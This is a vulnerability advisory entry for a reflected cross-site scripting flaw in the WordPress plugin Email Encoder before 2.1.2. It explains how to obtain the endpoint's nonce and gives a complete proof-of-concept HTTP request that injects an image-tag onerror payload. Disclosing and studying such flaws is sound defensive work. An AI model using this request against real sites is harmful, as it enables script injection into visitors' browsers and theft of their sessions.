Email Encoder < 2.1.2 - Reflected Cross Site Scripting

2021-08-0200:00:00

dc11

279

0.001 Low

EPSS

Percentile

43.2%

JSON

The plugin has an endpoint that requires no authentication and will render a user supplied value in the HTML response without escaping or sanitizing the data.

The vulnerable function is nonce protected, the nonce can be found in the site's HTML source by searching for the javascript variable "eeb_ef" 

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Origin: http://127.0.0.1:8080
DNT: 1
Connection: keep-alive
Referer: http://127.0.0.1:8080/
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Upgrade-Insecure-Requests: 1

action=eeb_get_email_form_output&eebsec=<your nonce here>&eebMethod=escape&eebDisplay=&lt;img src=1 onerror=alert(1)&gt;

0.001 Low

EPSS

Percentile

43.2%

JSON

Related for WPEX-ID:625A272F-5C69-4F6A-8EEE-32F70CD4A558